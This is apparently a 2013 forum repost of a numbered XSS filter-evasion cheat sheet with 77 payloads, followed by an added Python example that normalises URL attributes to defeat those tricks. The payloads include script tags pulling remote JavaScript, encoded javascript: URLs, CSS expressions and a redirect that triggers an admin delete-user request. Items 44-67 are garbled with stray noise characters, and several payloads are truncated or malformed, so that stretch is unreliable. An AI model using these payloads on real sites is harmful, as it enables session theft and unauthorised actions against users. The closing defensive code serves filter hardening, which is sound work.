
XSS Attack Roundup

Posted on 2013-4-19 19:22:37
It seems t00ls has rather little material on XSS, so when I saw something good I copied it over, in case any classmates want to bookmark it.
(1) Plain XSS JavaScript injection
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
(2) IMG tag XSS using a JavaScript command
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
(3) IMG tag, no semicolon, no quotes
<IMG SRC=javascript:alert('XSS')>
(4) IMG tag, case-insensitive
<IMG SRC=JaVaScRiPt:alert('XSS')>
(5) HTML encoding (semicolons required)
<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#34;&#88;&#83;&#83;&#34;&#41;>
(6) Malformed IMG tag
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
(7) fromCharCode (calculator)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
(8) UTF-8 Unicode encoding (calculator)
<IMG SRC=jav..omitted..S')>
(9) 7-bit UTF-8 Unicode encoding without semicolons (calculator)
<IMG SRC=jav..omitted..S')>
(10) Hex encoding, also without semicolons (calculator)
<IMG SRC=&#x6A&#x61&#x76&#x61..omitted..&#x58&#x53&#x53&#x27&#x29>
(11) Embedded tab, splitting the JavaScript
<IMG SRC="jav	ascript:alert('XSS');">
(12) Embedded encoded tab, splitting the JavaScript
<IMG SRC="jav&#x09;ascript:alert('XSS');">
(13) Embedded newline
<IMG SRC="jav&#x0A;ascript:alert('XSS');">
(14) Embedded carriage return
<IMG SRC="jav&#x0D;ascript:alert('XSS');">
(15) Embedded multiline injected JavaScript; this is an extreme XSS example
<IMG SRC="javascript:alert('XSS')">
(16) Working around character limits (must be on the same page)
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval(z)</script>
(17) Null character
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out
12-7-1 T00LS - Powered by Discuz! Board
https://www.t00ls.net/viewthread ... table&tid=15267 2/6
(18) Null character 2; null characters basically have no effect in China, because there is nowhere to make use of them
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out
(19) Spaces and meta characters before the JavaScript in an IMG tag
<IMG SRC=" javascript:alert('XSS');">
(20) Non-alpha-non-digit XSS
<SCRIPT/XSS SRC="http://3w.org/XSS/xss.js"></SCRIPT>
(21) Non-alpha-non-digit XSS 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
(22) Non-alpha-non-digit XSS 3
<SCRIPT/SRC="http://3w.org/XSS/xss.js"></SCRIPT>
(23) Extraneous open brackets
<<SCRIPT>alert("XSS");//<</SCRIPT>
(24) No closing script tag (Firefox and similar browsers only)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
(25) No closing script tag 2
<SCRIPT SRC=//3w.org/XSS/xss.js>
(26) Half-open HTML/JavaScript XSS
<IMG SRC="javascript:alert('XSS')"
(27) Double open angle brackets
<iframe src=http://3w.org/XSS.html <
(28) No single quotes, double quotes or semicolons
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>
(29) Escape-filtered JavaScript
\";alert('XSS');//
(30) Closing the TITLE tag
</TITLE><SCRIPT>alert("XSS");</SCRIPT>
(31) INPUT image
<INPUT SRC="javascript:alert('XSS');">
(32) BODY image
<BODY BACKGROUND="javascript:alert('XSS')">
(33) BODY tag
<BODY('XSS')>
(34) IMG DYNSRC
<IMG DYNSRC="javascript:alert('XSS')">
(35) IMG LOWSRC
<IMG LOWSRC="javascript:alert('XSS')">
(36) BGSOUND
<BGSOUND SRC="javascript:alert('XSS');">
(37) STYLE sheet
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
(38) Remote stylesheet
<LINK REL="stylesheet" HREF="http://3w.org/xss.css">
(39) List-style-image
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS
(40) IMG VBscript
<IMG SRC='vbscript:msgbox("XSS")'>
(41) META with a link URL
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
(42) Iframe
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
(43) Frame
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
" v& i/ Q7 `8 C2 t, F' Q(44)Table
/ v/ T2 G  I% S* _<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
: p; z& |; a& ?(45)TD
; R7 \3 p' G% Y0 m5 t<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>& _2 f' U8 F8 U5 S0 C0 f
(46)DIV background-image
* N* g; T9 N* M. z<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
0 Q0 o9 P6 s  ^) Y(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-
( M8 l! D/ |2 A$ g8&13&12288&65279)
3 K) O9 l1 j- Q$ M& V<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
* `- r! |+ o0 i5 e" E7 w(48)DIV expression" ^% d7 p: D' z: }) o# {
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
6 W9 V0 p( o( X2 ^1 j$ P. \(49)STYLE属性分拆表达; l/ f  J% a1 R  O; A
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
( j/ g' ]& j8 v(50)匿名STYLE(组成:开角号和一个字母开头)  [! F& a9 R. T7 y2 @, y
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
$ i- x/ X6 k% ~3 E4 Q( U(51)STYLE background-image3 m( i6 |: M! E" @' P$ x
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A6 e1 V0 k' i2 L- w2 S
CLASS=XSS></A>
% B7 E2 v- }3 J* _/ E- P) _(52)IMG STYLE方式
* V. \) u* r0 U2 Bexppression(alert(“XSS”))’>
8 X2 \# {/ ~& n(53)STYLE background
2 H) `5 a, D! N; S# }<STYLE><STYLE
5 z& D' d/ i) Btype=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
4 |2 d! k' p/ h* Q(54)BASE
5 ?2 R, |1 y- c$ F<BASE HREF=”javascript:alert(‘XSS’);//”>
4 a( _* u) c: k! o, a( b1 {3 j(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
/ F  X7 }+ ]9 }. {* K9 l6 o<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>
+ T, F. ^; q6 Y/ L- o/ E(56)在flash中使用ActionScrpt可以混进你XSS的代码& }0 q! t) K. N" K/ \9 b
a=”get”;+ O' `+ P* I) @, t
b=”URL(\”";0 Y0 w/ L& i# k+ _. \1 L1 s8 O: F
c=”javascript:”;
7 v+ _0 s, x( [d=”alert(‘XSS’);\”)”;6 M4 r3 ]% G% f' J
eval_r(a+b+c+d);  l! @4 k& p+ f" s; i. B& A$ I
(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上+ \# ~% o' t9 N- s# T, ^
<HTML xmlns:xss>7 Q/ c5 d( k  i7 g" P+ U* {
<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>
1 o$ t- x  _& r9 C; U3 X6 _<xss:xss>XSS</xss:xss>
5 u7 f* Q  ]7 G. g1 c</HTML>0 Z* y; R) {& U6 o
(58)如果过滤了你的JS你可以在图片里添加JS代码来利用
- a* y2 x6 n! M7 R9 a<SCRIPT SRC=””></SCRIPT>
% ^6 u0 c  }1 O9 w  [  n* y(59)IMG嵌入式命令,可执行任意命令
2 s1 a2 n/ G4 K/ B! Q<IMG SRC=”http://www.XXX.com/a.php?a=b”>) |& D* t# }/ y+ R7 F+ `
(60)IMG嵌入式命令(a.jpg在同服务器)
: x% c' w5 E, C: |" lRedirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser  P* W) b& I  [0 {, q
(61)绕符号过滤- _/ d' \2 O: [: Z6 `& U
<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>
! {2 t) d7 ~+ J3 P' E(62)
. Y: X5 Z7 @6 c1 A, |; _<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>
3 e6 V/ w# d! Z( w(63)
$ L/ ^5 [. ?6 J6 D2 o<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>% k, b8 ]9 l% B' P" S# W
(64)$ t/ _; g5 X/ e8 V
<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>) L3 y, e" B% z& H0 I9 g1 j. ]
(65)
# U( G! X3 i; e8 l! n5 E<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>2 W6 g( J4 n7 m) ~! {! e
(66)
<SCRIPT a=">'>" SRC="http://3w.org/xss.js"></SCRIPT>
(67)
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://3w.org/xss.js"></SCRIPT>
(68) URL bypass
<A HREF="http://127.0.0.1/">XSS</A>
(69) URL encoding
<A HREF="http://3w.org">XSS</A>
(70) Decimal IP
<A HREF="http://3232235521">XSS</A>
(71) Hex IP
<A HREF="http://0xc0.0xa8.0x00.0x01">XSS</A>
(72) Octal IP
<A HREF="http://0300.0250.0000.0001">XSS</A>
(73) Mixed encoding
<A HREF="h
tt p://6 6.000146.0x7.147/"">XSS</A>
(74) Dropping the [http:]
<A HREF="//www.google.com/">XSS</A>
(75) Dropping the [www]
<A HREF="http://google.com/">XSS</A>
(76) Absolute DNS with a trailing dot
<A HREF="http://www.google.com./">XSS</A>
(77) javascript link
<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>

Original source: http://fuzzexp.org/u/0day/?p=14
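What the list above demonstrates, read from the defender's side, is that a filter which searches the raw attribute value for the string "javascript:" or compares the raw host against an allowlist is beaten by every encoding trick in it: case changes (4), character references with and without semicolons (5, 8-10), embedded tab, newline and carriage return (11-14), NUL bytes (17), leading whitespace (19), and for hosts the decimal, hex, octal and mixed IP spellings (70-73), scheme-relative URLs (74) and the trailing DNS dot (76). The following Python is an added example, not code from the original post or from the cheat sheet it copies; it canonicalises the value the way a browser's HTML and URL parsers would before checking it, so the check sees the same thing the browser does. Function names, the sample allowlist and all sample values are constructed for this example.

```python
# Added example (not from the original post): canonicalise a URL attribute value
# before checking it, instead of pattern-matching the raw text. Function names,
# the sample allowlist and the sample values are constructed for this example.
import html
import re
from typing import Optional
from urllib.parse import urlsplit

# C0 controls, space and DEL. Browsers drop tab/CR/LF anywhere inside a URL and
# strip leading/trailing controls; older engines also skipped NUL in the scheme.
_CONTROLS = re.compile(r"[\x00-\x20\x7f]")
# Schemes from the list that execute code when used as a URL (items 3 and 40).
_SCRIPT_SCHEMES = ("javascript:", "vbscript:")
# One dot-separated component of an inet_aton-style address:
# 0x-prefixed hex, leading-zero octal, or plain decimal.
_IPV4_PART = re.compile(r"0[xX][0-9a-fA-F]*|0[0-7]*|[1-9][0-9]*")


def normalize_url_attr(value: str) -> str:
    """Reduce an href/src value to what the browser's URL parser actually sees.

    html.unescape decodes named, decimal and hex character references, with or
    without a trailing semicolon (items 5, 8-10). Control characters are removed
    afterwards, so an encoded tab (&#x09;) disappears exactly like a literal one
    (items 11-14, 17, 19), and case-folding makes JaVaScRiPt: equal javascript:.
    """
    return _CONTROLS.sub("", html.unescape(value)).casefold()


def is_script_url(value: str) -> bool:
    """True if the attribute value resolves to a javascript: or vbscript: URL."""
    return normalize_url_attr(value).startswith(_SCRIPT_SCHEMES)


def canonical_ipv4(host: str) -> Optional[str]:
    """Expand inet_aton-style spellings (items 70-73) to a dotted quad.

    One to four parts are accepted; as in inet_aton the last part fills all the
    remaining bytes, so "3232235521", "0xc0.0xa8.0x00.0x01" and
    "0300.0250.0000.0001" all canonicalise to 192.168.0.1. Returns None when the
    host is not a numeric address at all.
    """
    parts = host.split(".")
    if not 1 <= len(parts) <= 4 or not all(_IPV4_PART.fullmatch(p) for p in parts):
        return None
    values = []
    for part in parts:
        if part[:2].lower() == "0x":
            values.append(int(part[2:] or "0", 16))
        elif part.startswith("0"):
            values.append(int(part, 8))
        else:
            values.append(int(part, 10))
    *leading, last = values
    tail_bits = 8 * (4 - len(leading))
    if any(v > 0xFF for v in leading) or last >> tail_bits:
        return None
    addr = 0
    for v in leading:
        addr = (addr << 8) | v
    addr = (addr << tail_bits) | last
    return ".".join(str((addr >> shift) & 0xFF) for shift in (24, 16, 8, 0))


def canonical_host(value: str) -> Optional[str]:
    """Canonical host of a URL attribute value: controls and entities normalised,
    lower-cased, trailing DNS dot removed (item 76), numeric addresses expanded.
    None when the value has no authority part (javascript:, relative paths, junk)."""
    try:
        host = urlsplit(normalize_url_attr(value)).hostname
    except ValueError:
        return None
    if not host:
        return None
    host = host.rstrip(".")
    return canonical_ipv4(host) or host


def href_allowed(value: str, allowed_hosts: frozenset) -> bool:
    """Allowlist check for a user-supplied href/src: reject script schemes, then
    require the canonical host to be on the list. Denylisting spellings cannot keep up."""
    if is_script_url(value):
        return False
    host = canonical_host(value)
    return host is not None and host in allowed_hosts


if __name__ == "__main__":
    allowed = frozenset({"www.google.com"})  # constructed sample allowlist
    samples = ("JaVaScRiPt:alert('XSS')", "jav&#x0A;ascript:alert('XSS');",
               "http://3232235521", "//www.google.com/", "http://www.google.com./")
    for s in samples:
        print(f"{s!r:42} host={canonical_host(s)!r} allowed={href_allowed(s, allowed)}")
```

The order of operations matters: entities are decoded first, then control characters are stripped, then the case is folded, so a tab written as `&#x09;` and a literal tab both vanish before the scheme comparison. Note that this example only covers the URL-valued attributes; the attribute-quoting and broken-tag tricks (items 20-27, 61-67) are a tokenizer problem and have to be handled by HTML-encoding output or by a real HTML sanitizer, not by any string check.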